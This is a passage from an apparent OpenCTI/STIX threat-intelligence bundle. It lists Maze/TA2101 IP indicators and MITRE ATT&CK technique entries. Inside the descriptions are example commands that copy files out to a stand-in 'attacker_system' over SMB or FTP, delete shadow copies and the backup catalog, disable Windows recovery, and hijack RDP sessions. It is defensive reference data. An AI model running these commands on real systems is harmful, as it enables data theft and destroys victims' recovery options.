"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.15.6']",
"valid_from": "2020-02-05T10:05:50.588Z",
"valid_until": "2021-02-04T10:05:50.588Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:51.508Z",
"modified": "2020-02-05T10:05:51.508Z",
"x_opencti_id": "93e9f9fc-b19d-46b5-a177-a154adfcc626",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--2e21736d-afe6-410e-8e99-7eb93c0089fa",
"type": "indicator",
"name": "92.63.15.8",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.15.8']",
"valid_from": "2020-02-05T10:05:53.786Z",
"valid_until": "2021-02-04T10:05:53.786Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:55.028Z",
"modified": "2020-02-05T10:05:55.028Z",
"x_opencti_id": "3a2c9e94-1de8-4abb-ab5c-5e0b7d43611d",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--ebfc934d-56bf-4eb9-be0c-fdadb647afae",
"type": "indicator",
"name": "92.63.17.245",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.17.245']",
"valid_from": "2020-02-05T10:05:56.992Z",
"valid_until": "2021-02-04T10:05:56.992Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:05:57.962Z",
"modified": "2020-02-05T10:05:57.962Z",
"x_opencti_id": "069a7607-178b-4824-b968-4bb96cfdf89a",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--f20433f5-12e8-4cda-b752-630ca2d16852",
"type": "indicator",
"name": "92.63.194.20",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.194.20']",
"valid_from": "2020-02-05T10:06:00.260Z",
"valid_until": "2021-02-04T10:06:00.260Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:01.088Z",
"modified": "2020-02-05T10:06:01.088Z",
"x_opencti_id": "3aa96da6-a5b8-4706-a668-27ad85b35970",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--69fdb470-d38d-405e-9ee3-364461504cf1",
"type": "indicator",
"name": "92.63.194.3",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.194.3']",
"valid_from": "2020-02-05T10:06:02.923Z",
"valid_until": "2021-02-04T10:06:02.923Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:03.797Z",
"modified": "2020-02-05T10:06:03.797Z",
"x_opencti_id": "c9831390-4675-4197-a60b-87b36fb047aa",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--05024cf6-871c-4274-bc86-103dce87bab7",
"type": "indicator",
"name": "92.63.29.137",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.29.137']",
"valid_from": "2020-02-05T10:06:05.618Z",
"valid_until": "2021-02-04T10:06:05.618Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:06.538Z",
"modified": "2020-02-05T10:06:06.538Z",
"x_opencti_id": "b3ee4932-cd66-4ad8-956e-3a6f3d88eaee",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--4f6cfd26-3328-40e5-90f7-e05d94fde810",
"type": "indicator",
"name": "92.63.32.2",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.32.2']",
"valid_from": "2020-02-05T10:06:08.398Z",
"valid_until": "2021-02-04T10:06:08.398Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:09.414Z",
"modified": "2020-02-05T10:06:09.414Z",
"x_opencti_id": "b1614f93-a023-4e53-89a7-e6fb5bbcf5fe",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--f732504e-0cc0-4dce-b7e5-efab624f300c",
"type": "indicator",
"name": "92.63.32.52",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.32.52']",
"valid_from": "2020-02-05T10:06:11.414Z",
"valid_until": "2021-02-04T10:06:11.414Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:12.368Z",
"modified": "2020-02-05T10:06:12.368Z",
"x_opencti_id": "b9c42a28-354a-4823-ac09-d78f57f96ad3",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--cd96e384-82b5-409f-8984-afc26a55e1c0",
"type": "indicator",
"name": "92.63.32.55",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.32.55']",
"valid_from": "2020-02-05T10:06:14.195Z",
"valid_until": "2021-02-04T10:06:14.195Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:15.189Z",
"modified": "2020-02-05T10:06:15.189Z",
"x_opencti_id": "b0249350-5f68-4650-b226-f5508fcb270d",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--8751d70a-582a-4cff-a1b6-a87717386606",
"type": "indicator",
"name": "92.63.32.57",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.32.57']",
"valid_from": "2020-02-05T10:06:17.092Z",
"valid_until": "2021-02-04T10:06:17.092Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:18.135Z",
"modified": "2020-02-05T10:06:18.135Z",
"x_opencti_id": "c7252593-79e1-465a-a398-cde1b8d192a0",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--20d5c6ac-ef7d-4cac-a941-104719daf80d",
"type": "indicator",
"name": "92.63.37.100",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.37.100']",
"valid_from": "2020-02-05T10:06:20.023Z",
"valid_until": "2021-02-04T10:06:20.023Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:20.976Z",
"modified": "2020-02-05T10:06:20.976Z",
"x_opencti_id": "20442013-02a9-42ee-8b5c-f031503ed936",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "indicator--16c3d153-3516-4637-aba4-cccf05121fcd",
"type": "indicator",
"name": "92.63.8.47",
"labels": [
"indicator"
],
"description": "Indicator related to Maze/TA2101 (possible C2/Recon).",
"pattern": "[ipv4-addr:value = '92.63.8.47']",
"valid_from": "2020-02-05T10:06:22.902Z",
"valid_until": "2021-02-04T10:06:22.902Z",
"x_opencti_pattern_type": "stix",
"created": "2020-02-05T10:06:24.154Z",
"modified": "2020-02-05T10:06:24.154Z",
"x_opencti_id": "99598776-0b84-433b-8128-3474999b4955",
"created_by_ref": "identity--80a869f7-fe53-4b36-a214-394334f20dab",
"object_marking_refs": [
"marking-definition--f814dace-5888-4848-ab23-326518531d3e"
]
},
{
"id": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"type": "identity",
"name": "The MITRE Corporation",
"identity_class": "organization",
"labels": [
"identity"
],
"created": "2017-06-01T00:00:00.000Z",
"modified": "2017-06-01T00:00:00.000Z",
"x_opencti_organization_class": "vendor",
"x_opencti_identity_type": "organization",
"x_opencti_id": "9206a1c4-eec4-3a4a-a777-5f862e92b1d4"
},
{
"id": "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168",
"type": "marking-definition",
"definition_type": "statement",
"definition": {
"statement": "Copyright 2017, The MITRE Corporation"
},
"created": "2017-06-01T00:00:00.000Z",
"x_opencti_modified": "2019-04-17T11:00:42.000Z",
"x_opencti_id": "33323333-866c-355c-9a2a-bb6a8e3f447e"
},
{
"id": "attack-pattern--f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
"type": "attack-pattern",
"x_opencti_external_id": "T1086",
"name": "PowerShell",
"labels": [
"attack-pattern"
],
"description": "PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. \n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nAdministrator permissions are required to use PowerShell to connect to remote systems.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack)\n\nPowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)",
"created": "2017-05-31T21:31:06.000Z",
"modified": "2019-12-09T18:07:24.000Z",
"x_opencti_id": "cdf8c45a-ee5d-325b-b1a5-b12899359e97",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--affdc44d-4a4a-4ffa-a391-9593344c468a",
"kill_chain_name": "mitre-attack",
"phase_name": "execution",
"x_opencti_id": "c4f5146a-9d20-3165-a443-f2046980029d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:35.000Z",
"x_opencti_modified": "2019-04-15T16:53:35.000Z"
}
],
"external_references": [
{
"id": "external-reference--b61f6c85-2244-4e68-b912-dc6c98fbbed1",
"source_name": "Malware Archaeology PowerShell Cheat Sheet",
"description": "Malware Archaeology. (2016, June). WINDOWS POWERSHELL LOGGING CHEAT SHEET - Win 7/Win 2008 or later. Retrieved June 24, 2016.",
"url": "http://www.malwarearchaeology.com/s/Windows-PowerShell-Logging-Cheat-Sheet-ver-June-2016-v2.pdf",
"x_opencti_id": "3b9fba73-d07d-3ba9-8760-86206515dbbd",
"x_opencti_created": "2019-04-15T17:20:32.000Z",
"x_opencti_modified": "2019-04-15T17:20:32.000Z"
},
{
"id": "external-reference--39cbcaa1-25f9-4f14-8699-189bb93cf3a0",
"source_name": "Github PowerShell Empire",
"description": "Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.",
"url": "https://github.com/PowerShellEmpire/Empire",
"x_opencti_id": "d379e404-3053-3fee-a538-bbafcc68271b",
"x_opencti_created": "2019-04-15T17:20:32.000Z",
"x_opencti_modified": "2019-04-15T17:20:32.000Z"
},
{
"id": "external-reference--ef028ccf-a483-4f8d-b69f-321d200bf4d4",
"source_name": "Github PSAttack",
"description": "Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.",
"url": "https://github.com/jaredhaight/PSAttack",
"x_opencti_id": "7f5d43e0-eb94-36ad-929f-8904cea070d5",
"x_opencti_created": "2019-04-15T17:20:31.000Z",
"x_opencti_modified": "2019-04-15T17:20:31.000Z"
},
{
"id": "external-reference--02893270-8079-4120-a08f-c5f1160f6eb5",
"source_name": "TechNet PowerShell",
"description": "Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.",
"url": "https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx",
"x_opencti_id": "016f4971-06c6-354a-8e1e-f3e970a86d70",
"x_opencti_created": "2019-04-15T17:20:30.000Z",
"x_opencti_modified": "2019-04-15T17:20:30.000Z"
},
{
"id": "external-reference--6ced85c9-c6f4-4a84-aa42-3d5f30705130",
"source_name": "FireEye PowerShell Logging 2016",
"description": "Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.",
"url": "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html",
"x_opencti_id": "88a51620-db33-3646-beff-ddba139c9cbf",
"x_opencti_created": "2019-04-15T17:20:30.000Z",
"x_opencti_modified": "2019-04-15T17:20:30.000Z"
},
{
"id": "external-reference--b2360d00-b23e-43a3-9f33-828d2772b839",
"source_name": "Powersploit",
"description": "PowerSploit. (n.d.). Retrieved December 4, 2014.",
"url": "https://github.com/mattifestation/PowerSploit",
"x_opencti_id": "efb827ff-6f3c-3ab6-8afd-dc41d5b89c30",
"x_opencti_created": "2019-04-15T16:57:34.000Z",
"x_opencti_modified": "2019-04-15T16:57:34.000Z"
},
{
"id": "external-reference--27145ca7-1401-4be8-ad4b-58ca431cb299",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1086",
"external_id": "T1086",
"x_opencti_id": "af8b5897-4705-3448-bf3e-1abdb840e33e",
"x_opencti_created": "2019-04-15T17:20:29.000Z",
"x_opencti_modified": "2019-04-15T17:20:29.000Z"
},
{
"id": "external-reference--f5c8197c-c7dd-4a12-aff6-6fe2478bc2ea",
"source_name": "Sixdub PowerPick Jan 2016",
"description": "Warner, J.. (2015, January 6). Inexorable PowerShell \u2013 A Red Teamer\u2019s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.",
"url": "http://www.sixdub.net/?p=367",
"x_opencti_id": "3dd3b734-b827-47aa-a6f6-4521b68f6c42",
"x_opencti_created": "2019-10-23T14:55:23.000Z",
"x_opencti_modified": "2019-10-23T14:55:23.000Z"
},
{
"id": "external-reference--d1938bce-0690-4c60-b2f8-20e5581dc115",
"source_name": "SilentBreak Offensive PS Dec 2015",
"description": "Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.",
"url": "https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/",
"x_opencti_id": "f6dffc2d-2905-4c80-b35f-a4462f297e05",
"x_opencti_created": "2019-10-23T14:55:23.000Z",
"x_opencti_modified": "2019-10-23T14:55:23.000Z"
},
{
"id": "external-reference--41535f62-7650-48da-81dd-79c688a2af7c",
"source_name": "Microsoft PSfromCsharp APR 2014",
"description": "Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.",
"url": "https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/",
"x_opencti_id": "ddcd3f16-0549-46b7-8027-8509508e40c1",
"x_opencti_created": "2019-10-23T14:55:24.000Z",
"x_opencti_modified": "2019-10-23T14:55:24.000Z"
}
]
},
{
"id": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
"type": "attack-pattern",
"x_opencti_external_id": "T1193",
"name": "Spearphishing Attachment",
"labels": [
"attack-pattern"
],
"description": "Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.\n\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.",
"created": "2018-04-18T17:59:24.000Z",
"modified": "2020-01-26T17:42:37.198Z",
"x_opencti_id": "d83a4231-2314-315d-abc4-6c6574257dbf",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--20aa9cbb-eb48-4569-9860-f0de6dab6b12",
"kill_chain_name": "mitre-attack",
"phase_name": "initial-access",
"x_opencti_id": "471c7de8-e846-3fc9-a57e-4a7b770b8f1d",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T17:00:39.000Z",
"x_opencti_modified": "2019-04-15T17:00:39.000Z"
}
],
"external_references": [
{
"id": "external-reference--92870416-e8a4-4877-93e8-dd8f9ca9a923",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1193",
"external_id": "T1193",
"x_opencti_id": "67647521-1c30-3567-bada-79d286d923e2",
"x_opencti_created": "2019-04-15T17:26:04.000Z",
"x_opencti_modified": "2019-04-15T17:26:04.000Z"
},
{
"id": "external-reference--b3309d2b-794e-47a7-b2b0-cf33f1472851",
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/163.html",
"external_id": "CAPEC-163",
"x_opencti_id": "84ec0f8d-dda4-33b3-b687-b5e00d0ad981",
"x_opencti_created": "2019-04-15T17:26:05.000Z",
"x_opencti_modified": "2019-04-15T17:26:05.000Z"
}
]
},
{
"id": "attack-pattern--51dea151-0898-4a45-967c-3ebee0420484",
"type": "attack-pattern",
"x_opencti_external_id": "T1076",
"name": "Remote Desktop Protocol",
"labels": [
"attack-pattern"
],
"description": "Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS). (Citation: TechNet Remote Desktop Services) There are other implementations and third-party tools that provide graphical access [Remote Services](https://attack.mitre.org/techniques/T1021) similar to RDS.\n\nAdversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials. Adversaries will likely use Credential Access techniques to acquire credentials to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility Features](https://attack.mitre.org/techniques/T1015) technique for Persistence. (Citation: Alperovitch Malware)\n\nAdversaries may also perform RDP session hijacking which involves stealing a legitimate user's remote session. Typically, a user is notified when someone else is trying to steal their session and prompted with a question. With System permissions and using Terminal Services Console, `c:\\windows\\system32\\tscon.exe [session number to be stolen]`, an adversary can hijack a session without the need for credentials or prompts to the user. (Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions. (Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in RedSnarf. (Citation: Kali Redsnarf)",
"created": "2017-05-31T21:30:59.000Z",
"modified": "2020-02-01T17:44:36.466Z",
"x_opencti_id": "6ab2aae8-dbcc-3f4d-9d80-a4b3fb7e68e4",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--9b0f88fe-3501-4692-8b40-56d15aaf9eb3",
"kill_chain_name": "mitre-attack",
"phase_name": "lateral-movement",
"x_opencti_id": "4084cfad-87e8-35c3-8162-e2db612f1cf1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:53:36.000Z",
"x_opencti_modified": "2019-04-15T16:53:36.000Z"
}
],
"external_references": [
{
"id": "external-reference--ef56d5f8-9518-488f-a80e-dc16ae6b5429",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1076",
"external_id": "T1076",
"x_opencti_id": "18b9aef1-da98-3e3c-94b5-1a8f2d7052c2",
"x_opencti_created": "2019-04-15T17:22:41.000Z",
"x_opencti_modified": "2019-04-15T17:22:41.000Z"
},
{
"id": "external-reference--62a8d4eb-144f-468c-81a9-23f4cf6e8924",
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/555.html",
"external_id": "CAPEC-555",
"x_opencti_id": "689a1341-1258-329b-89d1-811f3ebd4cfb",
"x_opencti_created": "2019-04-15T17:22:42.000Z",
"x_opencti_modified": "2019-04-15T17:22:42.000Z"
},
{
"id": "external-reference--a2e441da-91e1-4e4a-a67c-e92d94df3c08",
"source_name": "Alperovitch Malware",
"description": "Alperovitch, D. (2014, October 31). Malware-Free Intrusions. Retrieved November 4, 2014.",
"url": "http://blog.crowdstrike.com/adversary-tricks-crowdstrike-treats/",
"x_opencti_id": "7deab4d9-07cb-39e1-a083-346a96ab7528",
"x_opencti_created": "2019-04-15T17:22:42.000Z",
"x_opencti_modified": "2019-04-15T17:22:42.000Z"
},
{
"id": "external-reference--ebe04a9a-3772-48fb-b268-33c41272b1bf",
"source_name": "TechNet Remote Desktop Services",
"description": "Microsoft. (n.d.). Remote Desktop Services. Retrieved June 1, 2016.",
"url": "https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx",
"x_opencti_id": "3a7ba0a9-e538-3bde-9f71-e1b29ce104d9",
"x_opencti_created": "2019-04-15T17:22:43.000Z",
"x_opencti_modified": "2019-04-15T17:22:43.000Z"
},
{
"id": "external-reference--a28b94f4-ef9f-4bd7-8c24-d2bc071e429e",
"source_name": "Kali Redsnarf",
"description": "NCC Group PLC. (2016, November 1). Kali Redsnarf. Retrieved December 11, 2017.",
"url": "https://github.com/nccgroup/redsnarf",
"x_opencti_id": "a55f22fc-a116-3313-9578-344b226250f2",
"x_opencti_created": "2019-04-15T17:22:45.000Z",
"x_opencti_modified": "2019-04-15T17:22:45.000Z"
},
{
"id": "external-reference--e6f57b7e-0abe-42bb-bc0c-45187bd58e74",
"source_name": "RDP Hijacking Medium",
"description": "Beaumont, K. (2017, March 19). RDP hijacking\u200a\u2014\u200ahow to hijack RDS and RemoteApp sessions transparently to move through an organisation. Retrieved December 11, 2017.",
"url": "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6",
"x_opencti_id": "04609b65-87d4-33f2-a28c-56fe2bbc928a",
"x_opencti_created": "2019-04-15T17:22:44.000Z",
"x_opencti_modified": "2019-04-15T17:22:44.000Z"
},
{
"id": "external-reference--250cf804-54ce-43db-a6b4-d7f4105ebbe3",
"source_name": "RDP Hijacking Korznikov",
"description": "Korznikov, A. (2017, March 17). Passwordless RDP Session Hijacking Feature All Windows versions. Retrieved December 11, 2017.",
"url": "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html",
"x_opencti_id": "1ec5a4bf-87cb-3f83-9dc6-1e4da46a36de",
"x_opencti_created": "2019-04-15T17:22:44.000Z",
"x_opencti_modified": "2019-04-15T17:22:44.000Z"
}
]
},
{
"id": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776",
"type": "attack-pattern",
"x_opencti_external_id": "T1048",
"name": "Exfiltration Over Alternative Protocol",
"labels": [
"attack-pattern"
],
"description": "Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage.\n\nAdversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol. \n\nSMB command-line example:\n\n* `net use \\\\\\attacker_system\\IPC$ /user:username password && xcopy /S /H /C /Y C:\\Users\\\\* \\\\\\attacker_system\\share_folder\\`\n\nAnonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016)\n\n* `echo PUT C:\\Path\\to\\file.txt | ftp -A attacker_system`\n",
"created": "2017-05-31T21:30:44.000Z",
"modified": "2020-02-01T18:42:16.999Z",
"x_opencti_id": "34e9d31a-60d5-32da-89ab-bb7b876789ab",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5be39400-f246-4d70-b62e-9af8ecf62ee3",
"kill_chain_name": "mitre-attack",
"phase_name": "exfiltration",
"x_opencti_id": "1019d87a-7952-3847-b24e-a3b866f89afb",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-04-15T16:54:14.000Z",
"x_opencti_modified": "2019-04-15T16:54:14.000Z"
}
],
"external_references": [
{
"id": "external-reference--e17ed2ca-8eae-4f69-a6ec-b2bf87d3053d",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1048",
"external_id": "T1048",
"x_opencti_id": "897bc71e-43f5-3775-a475-a92066ad7951",
"x_opencti_created": "2019-04-15T17:01:22.000Z",
"x_opencti_modified": "2019-04-15T17:01:22.000Z"
},
{
"id": "external-reference--0c90aff7-f2af-4cb9-81f5-5f0d29ba98ce",
"source_name": "University of Birmingham C2",
"description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.",
"url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf",
"x_opencti_id": "a986b1d3-c365-3ccb-a677-4913160f8f8c",
"x_opencti_created": "2019-04-15T16:56:34.000Z",
"x_opencti_modified": "2019-04-15T16:56:34.000Z"
},
{
"id": "external-reference--0d527192-36cc-4b71-9141-7f60f5c1ae41",
"source_name": "Palo Alto OilRig Oct 2016",
"description": "Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.",
"url": "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/",
"x_opencti_id": "5b6cd692-37a9-43af-8acc-eede29bde200",
"x_opencti_created": "2019-12-09T18:43:46.000Z",
"x_opencti_modified": "2019-12-09T18:43:46.000Z"
}
]
},
{
"id": "attack-patern--c8bd35e8-f4ad-4001-8440-51b91d37d947",
"type": "attack-pattern",
"x_opencti_external_id": "T1490",
"name": "Inhibit System Recovery",
"labels": [
"attack-pattern"
],
"description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* `vssadmin.exe` can be used to delete all volume shadow copies on a system - `vssadmin.exe delete shadows /all /quiet`\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - `wmic shadowcopy delete`\n* `wbadmin.exe` can be used to delete the Windows Backup Catalog - `wbadmin.exe delete catalog -quiet`\n* `bcdedit.exe` can be used to disable automatic Windows recovery features by modifying boot configuration data - `bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no`",
"created": "2019-09-18T13:35:16.000Z",
"modified": "2020-02-01T20:32:11.341Z",
"x_opencti_id": "780ba549-6fd2-4a15-8db0-edb0507ff872",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"kill_chain_phases": [
{
"id": "kill-chain-phase--5a036e0e-9cb2-4add-b669-d61285790656",
"kill_chain_name": "mitre-attack",
"phase_name": "impact",
"x_opencti_id": "52deaaf0-805a-4105-bed3-9133c89dd1e1",
"x_opencti_phase_order": 0,
"x_opencti_created": "2019-09-18T13:36:37.000Z",
"x_opencti_modified": "2019-09-18T13:36:37.000Z"
}
],
"external_references": [
{
"id": "external-reference--48d9419c-22a1-4ee8-a95d-fe35ec1908f2",
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1490",
"external_id": "T1490",
"x_opencti_id": "8448731f-919f-407d-91ae-d434b6586f13",
"x_opencti_created": "2019-10-24T00:14:39.000Z",
"x_opencti_modified": "2019-10-24T00:14:39.000Z"
},
{
"id": "external-reference--a4d45728-062c-43c3-8390-c1f9d42f4fc8",
"source_name": "Talos Olympic Destroyer 2018",
"description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.",
